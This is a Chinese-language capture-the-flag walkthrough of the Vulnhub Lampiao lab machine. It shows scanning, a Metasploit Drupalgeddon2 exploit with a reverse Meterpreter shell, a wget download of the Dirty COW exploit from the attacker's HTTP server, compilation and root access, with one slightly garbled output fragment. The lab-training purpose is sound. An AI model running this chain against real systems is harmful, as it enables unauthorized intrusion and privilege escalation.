《Vulnhub通关手册》——02 Lampiao

背景概述：

下载地址为：https://www.vulnhub.com/entry/lampiao-1,249/

本次的靶机ip为192.168.2.230

使用nmap进行活跃主机发现，使用命令nmap -sP 192.168.2.0/24，扫描结果如下。

└─$ sudo nmap -sP 192.168.2.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 11:27 CST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: about 22.16% done; ETC: 11:27 (0:00:07 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: about 100.00% done; ETC: 11:27 (0:00:00 remaining)
Nmap scan report for 192.168.2.2
Host is up (0.21s latency).
MAC Address: EC:3C:BB:AE:B7:45 (Huawei Device)
Nmap scan report for 192.168.2.45
Host is up (0.11s latency).
MAC Address: 42:63:96:C3:0E:82 (Unknown)
……
Nmap scan report for 192.168.2.230
Host is up (0.00033s latency).
MAC Address: 00:0C:29:B8:50:AD (VMware)

根据MAC地址可知靶机的IP地址为192.168.2.230。

使用nmap进行目标主机开放端口扫描，命令为nmap -p 1-65535 -sS -Pn 192.168.2.230，扫描得出结果为

└─$ sudo nmap -p 1-65535 -sS -Pn 192.168.2.230
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 12:18 CST
Nmap scan report for 192.168.2.230
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:0C:29:B8:50:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

根据扫描结果可知，目标主机开放了22、80、1898三个端口。

使用dirb进行目标靶机的目录扫描，分别对80、1898端口进行扫描，发现1898端口存在可能可以利用的目录。

└─$ sudo dirb http://192.168.2.230:1898/                                                                                255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Dec  7 12:44:48 2021
URL_base: http://192.168.2.230:1898/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.230:1898/ ----
==> DIRECTORY: http://192.168.2.230:1898/includes/                                                                           
+ http://192.168.2.230:1898/index.php (CODE:200|SIZE:11423)                                                                  
==> DIRECTORY: http://192.168.2.230:1898/misc/                                                                               
==> DIRECTORY: http://192.168.2.230:1898/modules/                                                                            
==> DIRECTORY: http://192.168.2.230:1898/profiles/                                                                           
+ http://192.168.2.230:1898/robots.txt (CODE:200|SIZE:2189)                                                                  
==> DIRECTORY: http://192.168.2.230:1898/scripts/                                                                            
+ http://192.168.2.230:1898/server-status (CODE:403|SIZE:295)                                                                
==> DIRECTORY: http://192.168.2.230:1898/sites/                                                                              
==> DIRECTORY: http://192.168.2.230:1898/themes/                                                                             
+ http://192.168.2.230:1898/web.config (CODE:200|SIZE:2200)                                                                  
+ http://192.168.2.230:1898/xmlrpc.php (CODE:200|SIZE:42)                                                   ……                                                                             
-----------------
END_TIME: Tue Dec  7 12:44:56 2021
DOWNLOADED: 4612 - FOUND: 5

可知该站点存在目录有http://192.168.2.230:1898/includes/、http://192.168.2.230:1898/misc/、http://192.168.2.230:1898/modules/、http://192.168.2.230:1898/profiles/、http://192.168.2.230:1898/profiles/、DIRECTORY: http://192.168.2.230:1898/scripts/、http://192.168.2.230:1898/sites/、http://192.168.2.230:1898/themes/。

1. 使用御剑WEB指纹识别系统进行站点的指纹识别，添加站点为http://192.168.2.230:1898进行扫描，得出应用指纹为Drupal(水滴)。
   但是并未获得CMS的版本信息，因此我们可以使用CMSeek

   来进行版本信息的探测，使用命令python3 cmseek.py -u 192.168.2.230:1898，得出Drupal 7。

2. 使用httprint进行中间件探测，得出目标系统为Apache/2.4.7 (Ubuntu)。

3. 使用nmap进行目标端口服务版本探测，使用命令nmap -sV -p 1898 192.168.2.230，从结果可知Apache服务监听1898端口，Apanche版本为Apache httpd 2.4.7 ((Ubuntu))。

4. 从第三步中可知目标操作系统属于Ubuntu。

搜集Drupal 7的相关漏洞信息，发现存在CVE-2018-7600 DRUPAL 7.X 版本代码执行，尝试使用msf进行攻击。

┌──(rootkali)-[/home/hehao/桌面/CMSeeK]
└─# msfdb run                                                  //打开msf
[+] Starting database

       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

metasploit tip: View all productivity tips with the 
tips command

[*] Starting persistent handler(s)...

msf6 > search CVE:2018-7600                                   //搜索CVE编号为2018-7600的漏洞利用

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2           //使用该漏洞利用
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options //查看选项参数

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.253    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.230   //设置目标IP
RHOSTS => 192.168.2.230
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898             //设置目标端口
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run                        //运行，开始攻击

[*] Started reverse TCP handler on 192.168.2.253:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.2.230

[*] Meterpreter session 1 opened (192.168.2.253:4444 -> 192.168.2.230:54384) at 2021-12-08 16:13:52 +0800

shell

meterpreter > shell                                                          //进入shell界面

成功获取到shell！

执行shell获取交互式命令，由于我们获取的shell并不是一个具有完整交互的shell，对于已经安装了python的系统，我们可以使用python提供的pty模块，只需要一行脚本就可以创建一个原生的终端。

在获得shell界面输入命令python -c 'import pty; pty.spawn("/bin/bash")'。

继续进行信息收集，输入命令uname -a，得到Linux lampiao 4.4.0-31-generic，这里使用linux内核版本为4.4.0，因此可以使用脏牛提权。

kali攻击机搜索相应的攻击载荷，并在当前文件夹开启http服务准备攻击载荷的传输。

└─# searchsploit dirty                                          //搜索攻击载荷
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                      | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                      | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege E | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation  | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalati | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL             | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                   | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                    | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                         | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                         | linux/local/46362.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(rootkali)-[/home/hehao/桌面]
└─# searchsploit -m 40847.cpp                                //使用-m参数，将40847.cpp文件复制到当前文件夹
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
File Type: C++ source, ASCII text, with CRLF line terminators

Copied to: /home/hehao/桌面/40847.cpp
                                                                                                       
┌──(rootkali)-[/home/hehao/桌面]
└─# python3 -m http.server 8888                             //在当前目录下开启http服务，准备文件的传输
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.2.252 - - [08/Dec/2021 16:46:12] "GET /40847.cpp HTTP/1.1" 200 -

在获取到的目标机的Shell界面上，下载远程文件，并执行，获取root账户，并进入根目录，查看flag：

www-data@lampiao:/var/www/html$ wget http://192.168.2.253:8888/40847.cpp    //下载远程文件
wget http://192.168.2.253:8888/40847.cpp
--2021-12-08 06:46:11--  http://192.168.2.253:8888/40847.cpp
Connecting to 192.168.2.253:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'

100%[======================================>] 10,531      --.-K/s   in 0s      

2021-12-08 06:46:11 (100 MB/s) - '40847.cpp' saved [10531/10531]

www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil  //进行编译生成一个 dcow文件
 /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# whoami                         //查看当前权限
whoami
root
root@lampiao:~# cd /root                       //进入根目录
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt                   //拿到flag
cat flag.txt
9740616875908d91ddcdaa8aea3af366